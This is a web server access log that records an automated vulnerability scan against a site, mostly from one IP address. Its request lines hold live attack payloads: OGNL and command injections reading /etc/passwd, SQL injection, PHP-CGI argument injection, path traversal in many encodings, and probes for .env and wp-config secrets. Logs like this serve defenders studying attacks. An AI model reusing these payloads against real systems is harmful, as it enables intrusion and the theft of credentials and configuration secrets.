195.164.49.69 - - [20/Oct/2024:15:33:42 +0000] GET /current_config/passwd HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:15:33:44 +0000] GET /users/sign_in HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:15:33:47 +0000] GET /SetupWizard.aspx/RfHeMGsiUc HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:15:33:53 +0000] GET /index.php?s=/index/index/name/$%7B@phpinfo()%7D HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:33:55 +0000] GET /webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152 HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:33:57 +0000] GET /?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:33:59 +0000] GET /compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+ HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:15:34:01 +0000] POST /PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:34:03 +0000] GET /+CSCOE+/session_password.html HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:34:05 +0000] GET /prweb/PRAuth/app/default/ HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:15:34:06 +0000] GET /ipython/tree HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:34:08 +0000] GET /pods HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:15:34:10 +0000] GET /api/v1/pods HTTP/1.1 404 1093
- - - [20/Oct/2024:15:34:12 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:34:14 +0000] GET /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd HTTP/1.1 404 1172
195.164.49.69 - - [20/Oct/2024:15:34:17 +0000] POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:34:19 +0000] GET /__ HTTP/1.1 404 1076
195.164.49.69 - - [20/Oct/2024:15:34:21 +0000] POST /nagiosql/admin/logbook.php HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:15:34:23 +0000] POST /api/external/7.0/system.System.get_infos HTTP/1.1 404 1126
195.164.49.69 - - [20/Oct/2024:15:34:25 +0000] POST /XMLCHART HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:34:31 +0000] GET /api/experimental/test HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:34:33 +0000] GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1 404 1155
195.164.49.69 - - [20/Oct/2024:15:34:35 +0000] POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1 404 1147
195.164.49.69 - - [20/Oct/2024:15:34:38 +0000] GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Epbxg.txt HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:15:34:40 +0000] GET /include/pbxg.txt HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:34:42 +0000] GET /user/login HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:15:34:46 +0000] POST /index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:34:49 +0000] POST /index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:34:50 +0000] GET /images/..%2finfo.html HTTP/1.1 400 1169
- - - [20/Oct/2024:15:34:52 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:34:54 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:35:00 +0000] GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name=2nhw8YFmxxU5jO6lEssSF2x24Pa.php:aaa HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:15:35:02 +0000] GET /user/login HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:15:35:06 +0000] GET /?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5(999999999),null,null%20--%20g HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:35:14 +0000] POST /opencms/cmisatom/cmis-online/query HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:15:35:16 +0000] POST /cmisatom/cmis-online/query HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:15:35:20 +0000] POST /clients/MyCRL HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:15:35:24 +0000] GET /controlloLogin.js HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:15:35:31 +0000] GET /?p=1 HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:35:33 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:35:35 +0000] POST /html/ad/adfilestorage/request/checkAcesso.php HTTP/1.1 404 1135
195.164.49.69 - - [20/Oct/2024:15:35:38 +0000] POST /webtools/control/forgotPassword/xmldsdump HTTP/1.1 404 1127
195.164.49.69 - - [20/Oct/2024:15:35:40 +0000] GET /common/gmxpi.txt HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:35:43 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:35:43 +0000] GET /interface-data/books-init HTTP/1.1 404 1103
83.212.98.101 - - [20/Oct/2024:15:35:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:15:35:47 +0000] GET /ProcessPlus HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:15:35:49 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:35:51 +0000] GET /api/v1/apikey?/api/v1/ping HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:35:53 +0000] POST /api/account/auth/form HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:35:55 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:35:57 +0000] POST /json HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:15:35:59 +0000] POST /web/rest/v1/login/sessions HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:15:36:03 +0000] POST /web/rest/v1/login/sessions HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:15:36:03 +0000] POST /web/rest/v1/login/sessions HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:15:36:03 +0000] POST /web/rest/v1/login/sessions HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:15:36:03 +0000] POST /web/rest/v1/login/sessions HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:15:36:04 +0000] POST /web/rest/v1/login/sessions HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:15:36:04 +0000] POST /web/rest/v1/login/sessions HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:15:36:04 +0000] POST /web/rest/v1/login/sessions HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:15:36:15 +0000] POST /api/v1/users/signin HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:15:36:17 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:36:23 +0000] GET /api/proxy/tcp HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:36:23 +0000] GET /geoserver/web/ HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:15:36:25 +0000] POST /geoserver/j_spring_security_check HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:15:36:27 +0000] POST /?wicket:interface=:0:userPanel:loginForm::IFormSubmitListener:: HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:36:30 +0000] POST /hmc/j_security_check HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:36:33 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:36:58 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:37:05 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:37:05 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:37:05 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:37:05 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:37:05 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:37:05 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:37:05 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:37:05 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:37:06 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:37:06 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:37:06 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:37:06 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:37:06 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:37:06 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:37:06 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:37:06 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:37:07 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:37:07 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:37:07 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:37:07 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:37:07 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:37:07 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:37:07 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:37:21 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:37:25 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:37:26 +0000] GET /jmx-console/ HTTP/1.1 404 1090
83.212.98.101 - - [20/Oct/2024:15:37:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:15:37:27 +0000] POST /lucee/admin/web.cfm HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:37:29 +0000] GET /login_password_page.php HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:15:37:33 +0000] GET /control/userimage.html HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:15:37:35 +0000] GET /control/userimage.html HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:15:37:37 +0000] POST /netflow/jspui/j_security_check HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:15:37:39 +0000] POST /?q=common/login HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:37:41 +0000] GET /config/pw_left_bar.html HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:37:47 +0000] POST /api/v1/signin HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:37:48 +0000] POST /api/v1/signin HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:37:48 +0000] POST /api/v1/signin HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:37:48 +0000] GET /?/AdminAppData@no-mobile-0/0/15503332983847185/ HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:37:52 +0000] GET /admin/default/ HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:15:37:55 +0000] POST /api/authenticate HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:37:57 +0000] GET /userRpm/MenuRpm.htm HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:15:37:59 +0000] GET /userRpm/LoginRpm.htm?Save=Save HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:38:01 +0000] POST /VisionHubWebApi/api/Login HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:38:03 +0000] POST /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:15:38:04 +0000] POST /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:15:38:06 +0000] POST /zabbix/index.php HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:38:08 +0000] POST /index.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:38:11 +0000] GET /.env_sample HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:15:38:14 +0000] GET /.env HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:15:38:15 +0000] GET /.env.dev.local HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:15:38:15 +0000] GET /.env.development.local HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:15:38:15 +0000] GET /.env.prod.local HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:15:38:15 +0000] GET /.env.production.local HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:38:15 +0000] GET /.env.local HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:38:15 +0000] GET /.env.example HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:15:38:15 +0000] GET /.env.stage HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:38:15 +0000] GET /.env.live HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:38:16 +0000] GET /.env_1 HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:15:38:16 +0000] GET /.env.old HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:38:34 +0000] GET /slr/application/configs/application.ini HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:15:38:43 +0000] GET /application/configs/application.ini HTTP/1.1 404 1117
195.164.49.69 - - [20/Oct/2024:15:38:43 +0000] GET /admin/configs/application.ini HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:15:38:43 +0000] GET /application.ini HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:15:38:43 +0000] GET /aplicacao/application/configs/application.ini HTTP/1.1 404 1131
195.164.49.69 - - [20/Oct/2024:15:38:43 +0000] GET /cloudexp/application/configs/application.ini HTTP/1.1 404 1130
195.164.49.69 - - [20/Oct/2024:15:38:44 +0000] GET /cms/application/configs/application.ini HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:15:38:44 +0000] GET /moto/application/configs/application.ini HTTP/1.1 404 1126
195.164.49.69 - - [20/Oct/2024:15:38:44 +0000] GET /Partners/application/configs/application.ini HTTP/1.1 404 1130
195.164.49.69 - - [20/Oct/2024:15:38:44 +0000] GET /radio/application/configs/application.ini HTTP/1.1 404 1127
195.164.49.69 - - [20/Oct/2024:15:38:44 +0000] GET /seminovos/application/configs/application.ini HTTP/1.1 404 1131
195.164.49.69 - - [20/Oct/2024:15:38:44 +0000] GET /shop/application/configs/application.ini HTTP/1.1 404 1126
195.164.49.69 - - [20/Oct/2024:15:38:45 +0000] GET /site_cg/application/configs/application.ini HTTP/1.1 404 1129
195.164.49.69 - - [20/Oct/2024:15:39:00 +0000] GET /miscadmin HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:39:04 +0000] GET /miscadmin HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:39:04 +0000] GET /mcmadmin HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:39:04 +0000] GET /miscadmin HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:39:04 +0000] GET /miscadmin HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:39:04 +0000] GET /miscadmin HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:39:04 +0000] GET /miscadmin HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:39:05 +0000] GET /miscadmin HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:39:05 +0000] GET /miscadmin HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:39:18 +0000] POST /cgi-bin/webproc HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:39:20 +0000] POST /api/v1/users/signup HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:15:39:22 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:39:24 +0000] GET /_debugbar/open HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:15:39:31 +0000] POST /Onboarding/Import HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:39:33 +0000] GET /guestLogin.html?guest=1 HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:15:39:34 +0000] POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:15:39:36 +0000] GET /api/.env HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:15:39:36 +0000] GET /.env HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:15:39:36 +0000] GET /.env.bak HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:39:37 +0000] GET /.env.dev HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:39:37 +0000] GET /.env.dev.local HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:15:39:37 +0000] GET /.env.development.local HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:15:39:37 +0000] GET /.env.prod HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:39:37 +0000] GET /.env.prod.local HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:15:39:37 +0000] GET /.env.production HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:15:39:37 +0000] GET /.env.production.local HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:39:37 +0000] GET /.env.local HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:39:38 +0000] GET /.env.example HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:15:39:38 +0000] GET /.env.stage HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:39:38 +0000] GET /.env.live HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:39:38 +0000] GET /.env.backup HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:15:39:38 +0000] GET /.env.save HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:39:38 +0000] GET /.env.old HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:39:38 +0000] GET /.env.www HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:39:38 +0000] GET /.env_1 HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:15:39:39 +0000] GET /.env_sample HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:15:39:39 +0000] GET /.env.iopan HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:39:39 +0000] GET /.env.sdc HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:40:27 +0000] GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini HTTP/1.1 404 1141
195.164.49.69 - - [20/Oct/2024:15:40:28 +0000] GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini HTTP/1.1 404 1141
195.164.49.69 - - [20/Oct/2024:15:40:28 +0000] GET /./../../../../../../../../../../windows/win.ini HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:40:28 +0000] GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini HTTP/1.1 404 1170
195.164.49.69 - - [20/Oct/2024:15:40:28 +0000] GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:40:28 +0000] GET /?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:40:29 +0000] GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:40:29 +0000] GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini HTTP/1.1 404 1229
195.164.49.69 - - [20/Oct/2024:15:40:29 +0000] GET /?redirect=..%2f..%2f..%2f..%2fwindows/win.ini HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:40:29 +0000] GET /..///////..////..//////windows/win.ini HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:40:29 +0000] GET /?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:40:35 +0000] GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00 HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:40:35 +0000] GET /%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:40:35 +0000] GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini HTTP/1.1 404 1144
195.164.49.69 - - [20/Oct/2024:15:40:35 +0000] GET /%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1 404 1211
195.164.49.69 - - [20/Oct/2024:15:40:35 +0000] GET /index.php?page=windows/win.ini HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:40:35 +0000] GET /index.php?page=windows/win.ini%00 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:40:35 +0000] GET /index.php?page=../../windows/win.ini HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:40:35 +0000] GET /index.php?page=....//....//windows/win.ini HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:40:36 +0000] GET /.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:40:36 +0000] GET /.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/windows/win.ini HTTP/1.1 404 1226
195.164.49.69 - - [20/Oct/2024:15:40:36 +0000] GET /../../../../../../../../../windows/win.ini HTTP/1.1 400 1160
83.212.98.101 - - [20/Oct/2024:15:40:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:15:41:03 +0000] POST /jc6/servlet/clobfield HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:41:05 +0000] GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:41:07 +0000] POST /index.php?mod=system&op=orgtree&do=orgtree HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:41:09 +0000] GET /videoseyret.php?id=95%20AND%20(SELECT%204581%20FROM%20(SELECT(SLEEP(6)))NyiX) HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:15:41:11 +0000] POST /index.php?q=result&searchfor=advancesearch HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:41:13 +0000] POST /MUP/ HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:41:16 +0000] GET /UploadService/Page/ HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:41:17 +0000] POST /direct/polling/CommandsPolling.php HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:15:41:19 +0000] POST /sitemap.xml?offset=1;SELECT%20IF((SLEEP(6)),1,2356) HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:15:41:21 +0000] POST /sitemap.xml?offset=1;SELECT%20IF((SLEEP(16)),1,2356) HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:15:41:23 +0000] POST /?BazaR&vue=saisir&action=saisir_fiche&id=2 HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:41:25 +0000] GET /?BazaR&vue=consulter HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:41:27 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:41:29 +0000] GET /yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(99999)+union+all+select+1,2,(md5(999999999)),4 HTTP/1.1 404 1136
195.164.49.69 - - [20/Oct/2024:15:41:31 +0000] POST /vision/RMIServlet?windowUnloading&%7a%44%70%34%57%70%34%67%52%69%70%2b%69%49%70%69%47%5a%70%34%44%52%77%36%2b%2f%4a%56%2f%75%75%75%37%75%4e%66%37%4e%66%4e%31%2f%75%37%31%27%2f%4e%4f%4a%4d%2f%4e%4f%4a%4e%2f%75%75%2f%4a%54 HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:41:33 +0000] POST /smartbi/vision/RMIServlet?windowUnloading&%7a%44%70%34%57%70%34%67%52%69%70%2b%69%49%70%69%47%5a%70%34%44%52%77%36%2b%2f%4a%56%2f%75%75%75%37%75%4e%66%37%4e%66%4e%31%2f%75%37%31%27%2f%4e%4f%4a%4d%2f%4e%4f%4a%4e%2f%75%75%2f%4a%54 HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:41:35 +0000] POST /general/file_folder/swfupload_new.php HTTP/1.1 404 1119
195.164.49.69 - - [20/Oct/2024:15:41:37 +0000] GET /_wpeprivate/config.json HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:41:43 +0000] GET /wp-config.php.inc HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:15:41:43 +0000] GET /wp-config.php-backup HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:41:43 +0000] GET /wp-config.php.swp HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:15:41:43 +0000] GET /wp-config.php HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:15:41:43 +0000] GET /wp-config.php.html HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:15:41:43 +0000] GET /.wp-config.php.swp HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:15:41:44 +0000] GET /wp-config-backup.txt HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:41:44 +0000] GET /wp-config-sample.php HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:41:44 +0000] GET /wp-config.php.save HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:15:41:44 +0000] GET /wp-config.inc HTTP/1.1 404 1087
